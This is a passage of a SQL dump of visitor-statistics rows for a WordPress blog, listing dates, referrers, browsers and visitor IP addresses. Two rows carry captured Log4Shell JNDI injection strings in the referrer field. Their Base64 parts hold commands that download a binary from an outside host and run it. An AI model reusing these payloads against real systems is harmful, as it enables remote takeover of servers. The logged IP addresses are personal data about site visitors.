(17861,'2022-01-02','http://ictbank.ir/blog','Chrome','Android','11',NULL,NULL,'','5.218.237.11','000',0,1,0),
(17862,'2022-01-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.213.52','000',0,1,0),
(17863,'2022-01-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.213.54','000',0,2,0),
(17864,'2022-01-03','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','54.189.60.112','000',0,2,0),
(17865,'2022-01-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(17866,'2022-01-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.212.230.144','000',0,2,0),
(17867,'2022-01-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','95.216.12.21','000',0,1,0),
(17868,'2022-01-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,4,0),
(17869,'2022-01-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(17870,'2022-01-03','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','137.220.133.42','000',0,2,0),
(17871,'2022-01-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.111.46','000',0,1,0),
(17872,'2022-01-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.143','000',0,2,0),
(17873,'2022-01-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.250.19.242','000',0,2,0),
(17874,'2022-01-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.214.198','000',0,2,0),
(17875,'2022-01-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.15.206','000',0,1,0),
(17876,'2022-01-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.6.41','000',0,1,0),
(17877,'2022-01-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17878,'2022-01-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(17879,'2022-01-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(17880,'2022-01-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','85.233.160.31','000',0,1,0),
(17881,'2022-01-03','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.142','000',0,1,0),
(17882,'2022-01-03','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.190','000',0,1,0);
INSERT INTO `wp_statistics_visitor` VALUES
(17883,'2022-01-03','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.59','000',0,1,0),
(17884,'2022-01-03','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','46.101.9.216','000',0,7,0),
(17885,'2022-01-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.18.16.102','000',0,2,0),
(17886,'2022-01-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.191','000',0,1,0),
(17887,'2022-01-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(17888,'2022-01-04','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.34','000',0,1,0),
(17889,'2022-01-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','70.35.198.179','000',0,2,0),
(17890,'2022-01-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,3,0),
(17891,'2022-01-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(17892,'2022-01-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.138','000',0,2,0),
(17893,'2022-01-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','195.123.242.6','000',0,1,0),
(17894,'2022-01-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.25.254.133','000',0,1,0),
(17895,'2022-01-04','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','176.106.246.67','000',0,1,0),
(17896,'2022-01-04','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(17897,'2022-01-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(17898,'2022-01-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(17899,'2022-01-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(17900,'2022-01-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17901,'2022-01-04','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','66.249.93.191','000',0,1,0),
(17902,'2022-01-04','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','41.83.114.131','000',0,2,0),
(17903,'2022-01-04','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','66.249.93.165','000',0,1,0),
(17904,'2022-01-04','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','52.214.44.116','000',0,1,0),
(17905,'2022-01-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(17906,'2022-01-05','http://ictbank.ir','Internet Explorer','Windows','6.1',NULL,NULL,'','217.146.81.34','000',0,1,0),
(17907,'2022-01-05','t(\\\\\\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9zdGFyOyBjaG1vZCA3Nzcgc3RhcjsgLi9zdGFyIGV4cGxvaXQ=}\\\\\\\')','Obigo Q','Unknown','Unknown',NULL,NULL,'','172.111.36.142','000',0,1,0),
(17908,'2022-01-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(17909,'2022-01-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.12.126.16','000',0,1,0),
(17910,'2022-01-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.183.207.20','000',0,1,0),
(17911,'2022-01-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.223.59.181','000',0,1,0),
(17912,'2022-01-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.163','000',0,2,0),
(17913,'2022-01-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(17914,'2022-01-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.33.96.205','000',0,2,0),
(17915,'2022-01-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','109.74.197.146','000',0,2,0),
(17916,'2022-01-05','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','103.231.89.163','000',0,5,0),
(17917,'2022-01-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.18.94','000',0,1,0),
(17918,'2022-01-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.150.40','000',0,1,0),
(17919,'2022-01-05','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','13.87.94.162','000',0,10,0),
(17920,'2022-01-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,1,0),
(17921,'2022-01-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','164.90.206.15','000',0,1,0),
(17922,'2022-01-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(17923,'2022-01-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17924,'2022-01-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(17925,'2022-01-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.136.200.169','000',0,1,0),
(17926,'2022-01-05','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','188.163.73.203','000',0,1,0),
(17927,'2022-01-05','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(17928,'2022-01-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(17929,'2022-01-06','http://ictbank.ir/blog','Safari','OS X','Unknown',NULL,NULL,'','23.224.42.11','000',0,1,0),
(17930,'2022-01-06','http://ictbank.ir/blog','Unknown','iOS','Unknown',NULL,NULL,'','2.185.159.142','000',0,1,0),
(17931,'2022-01-06','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','5.236.132.55','000',0,2,0),
(17932,'2022-01-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.23.163.118','000',0,1,0),
(17933,'2022-01-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.213.165.207','000',0,1,0),
(17934,'2022-01-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(17935,'2022-01-06','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','2.185.72.220','000',0,1,0),
(17936,'2022-01-06','https://www.google.co.jp/','Chrome','Windows','10.0',NULL,NULL,'','85.203.23.244','000',0,1,0),
(17937,'2022-01-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.27.186.175','000',0,1,0),
(17938,'2022-01-06','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','14.241.245.17','000',0,1,0),
(17939,'2022-01-06','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','23.83.185.36','000',0,5,0),
(17940,'2022-01-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(17941,'2022-01-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.57.137.208','000',0,1,0),
(17942,'2022-01-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.243','000',0,2,0),
(17943,'2022-01-06','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,2,0),
(17944,'2022-01-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.139.220','000',0,1,0),
(17945,'2022-01-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','188.128.239.39','000',0,1,0),
(17946,'2022-01-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.55.215','000',0,1,0),
(17947,'2022-01-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17948,'2022-01-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(17949,'2022-01-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17950,'2022-01-06','http://ictbank.ir/blog','Chrome','OS X','10.9.4',NULL,NULL,'','43.135.167.149','000',0,2,0),
(17951,'2022-01-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.101','000',0,4,0),
(17952,'2022-01-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(17953,'2022-01-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.48','000',0,1,0),
(17954,'2022-01-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,3,0),
(17955,'2022-01-07','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','103.97.201.189','000',0,1,0),
(17956,'2022-01-07','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','159.65.56.191','000',0,3,0),
(17957,'2022-01-07','http://ictbank.ir/blog','Chrome','OS X','10.10.3',NULL,NULL,'','18.209.148.132','000',0,8,0),
(17960,'2022-01-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(17961,'2022-01-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(17962,'2022-01-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(17963,'2022-01-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(17964,'2022-01-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.15.55','000',0,1,0),
(17966,'2022-01-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(17967,'2022-01-07','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','85.114.121.132','000',0,1,0),
(17968,'2022-01-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(17969,'2022-01-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(17970,'2022-01-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17971,'2022-01-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(17972,'2022-01-07','http://ictbank.ir/blog','Safari','iOS','11.0',NULL,NULL,'','95.216.15.49','000',0,1,0),
(17973,'2022-01-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.143','000',0,1,0),
(17974,'2022-01-07','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.171','000',0,1,0),
(17975,'2022-01-08','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.193.11.6','000',0,1,0),
(17976,'2022-01-08','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','18.219.81.144','000',0,4,0),
(17977,'2022-01-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,3,0),
(17978,'2022-01-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.2.128','000',0,1,0),
(17979,'2022-01-08','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','74.120.168.15','000',0,1,0),
(17980,'2022-01-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(17981,'2022-01-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.219.146','000',0,1,0),
(17982,'2022-01-08','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.145','000',0,1,0),
(17983,'2022-01-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,1,0),
(17984,'2022-01-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(17985,'2022-01-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.87.236.91','000',0,1,0),
(17986,'2022-01-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.4.145.17','000',0,3,0),
(17987,'2022-01-08','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.58','000',0,1,0),
(17988,'2022-01-08','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.110','000',0,1,0),
(17989,'2022-01-08','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.223','000',0,1,0),
(17990,'2022-01-08','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.25','000',0,1,0),
(17991,'2022-01-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(17992,'2022-01-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.55.215','000',0,1,0),
(17993,'2022-01-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17994,'2022-01-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(17995,'2022-01-08','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','138.201.60.47','000',0,1,0),
(17996,'2022-01-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,9,0),
(17997,'2022-01-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(17998,'2022-01-09','http://www.ictbank.ir/blog','Chrome','OS X','10.11.3',NULL,NULL,'','134.122.5.53','000',0,9,0),
(17999,'2022-01-09','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.136','000',0,1,0),
(18000,'2022-01-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,3,0),
(18001,'2022-01-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(18002,'2022-01-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','165.227.9.69','000',0,1,0),
(18003,'2022-01-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.26.216.236','000',0,1,0),
(18004,'2022-01-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.213.54','000',0,2,0),
(18005,'2022-01-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(18006,'2022-01-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.6.41','000',0,1,0),
(18007,'2022-01-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(18008,'2022-01-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(18009,'2022-01-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(18010,'2022-01-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.47','000',0,1,0),
(18011,'2022-01-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,2,0),
(18012,'2022-01-10','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','18.116.72.123','000',0,4,0),
(18013,'2022-01-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18014,'2022-01-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.143','000',0,1,0),
(18015,'2022-01-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,5,0),
(18016,'2022-01-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.236.147.154','000',0,2,0),
(18017,'2022-01-10','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.225.163.202','000',0,3,0),
(18018,'2022-01-10','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','64.179.169.12','000',0,3,0),
(18019,'2022-01-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.31.21.7','000',0,2,0),
(18020,'2022-01-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(18021,'2022-01-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(18022,'2022-01-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(18023,'2022-01-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18024,'2022-01-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.82','000',0,2,0),
(18026,'2022-01-10','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','193.142.146.230','000',0,2,0),
(18027,'2022-01-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.175.44.135','000',0,2,0),
(18028,'2022-01-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.211.126.249','000',0,1,0),
(18029,'2022-01-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.83.7.96','000',0,2,0),
(18030,'2022-01-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18031,'2022-01-11','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','160.116.22.20','000',0,2,0),
(18032,'2022-01-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','20.39.35.179','000',0,2,0),
(18033,'2022-01-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(18034,'2022-01-11','http://ictbank.ir/','Opera','Windows','6.2',NULL,NULL,'','176.106.246.67','000',0,1,0),
(18035,'2022-01-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.50.185','000',0,1,0),
(18036,'2022-01-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(18037,'2022-01-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(18038,'2022-01-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18039,'2022-01-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(18040,'2022-01-11','http://www.ictbank.ir/blog','Chrome','iOS','12.1',NULL,NULL,'','192.99.18.122','000',0,1,0),
(18041,'2022-01-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,12,0),
(18042,'2022-01-12','t(\\\\\\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}\\\\\\\')','Unknown','Unknown','Unknown',NULL,NULL,'','165.232.155.141','000',0,1,0),
(18043,'2022-01-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,3,0),
(18044,'2022-01-12','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/#comment-73','Chrome','Windows','10.0',NULL,NULL,'','188.163.73.203','000',0,3,0),
(18045,'2022-01-12','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','50.16.179.100','000',0,2,0),
(18046,'2022-01-12','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.141','000',0,1,0),
(18047,'2022-01-12','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.148','000',0,1,0),
(18048,'2022-01-12','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.76','000',0,1,0),
(18049,'2022-01-12','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.30','000',0,1,0),
(18050,'2022-01-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','88.80.184.142','000',0,2,0),
(18051,'2022-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.217.0.224','000',0,2,0),
(18052,'2022-01-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','209.141.41.103','000',0,1,0),
(18053,'2022-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','183.66.49.34','000',0,1,0),
(18054,'2022-01-12','http://ictbank.ir/','Chrome','Windows','6.2',NULL,NULL,'','23.254.20.13','000',0,1,0),
(18055,'2022-01-12','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.35.128','000',0,1,0),
(18056,'2022-01-12','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.122.184','000',0,1,0),
(18057,'2022-01-12','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.42.155','000',0,2,0),
(18058,'2022-01-12','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','205.185.116.89','000',0,1,0),
(18059,'2022-01-12','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','103.114.158.1','000',0,1,0),
(18060,'2022-01-12','https://www.google.com/','Chrome','Android','4.4.2',NULL,NULL,'','37.44.60.60','000',0,1,0),
(18061,'2022-01-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.236.147.154','000',0,2,0),
(18062,'2022-01-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,2,0),
(18063,'2022-01-12','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','62.210.136.36','000',0,1,0),
(18064,'2022-01-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18065,'2022-01-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.55.215','000',0,1,0),
(18066,'2022-01-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(18067,'2022-01-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(18068,'2022-01-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,18,0),
(18069,'2022-01-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(18070,'2022-01-13','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','87.236.233.252','000',0,1,0),
(18071,'2022-01-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.227.37.255','000',0,2,0),
(18072,'2022-01-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.143','000',0,2,0),
(18073,'2022-01-13','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','41.110.141.253','000',0,1,0),
(18074,'2022-01-13','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','176.210.53.223','000',0,2,0),
(18075,'2022-01-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','2.179.39.36','000',0,8,0),
(18076,'2022-01-13','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','154.88.26.204','000',0,3,0),
(18077,'2022-01-13','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.65.157','000',0,1,0),
(18078,'2022-01-13','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','82.79.216.65','000',0,1,0),
(18079,'2022-01-13','http://ictbank.ir/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,2,0),
(18080,'2022-01-13','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','173.88.199.116','000',0,1,0),
(18081,'2022-01-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.219.2','000',0,1,0),
(18082,'2022-01-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18083,'2022-01-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(18084,'2022-01-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(18085,'2022-01-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.8','000',0,2,0),
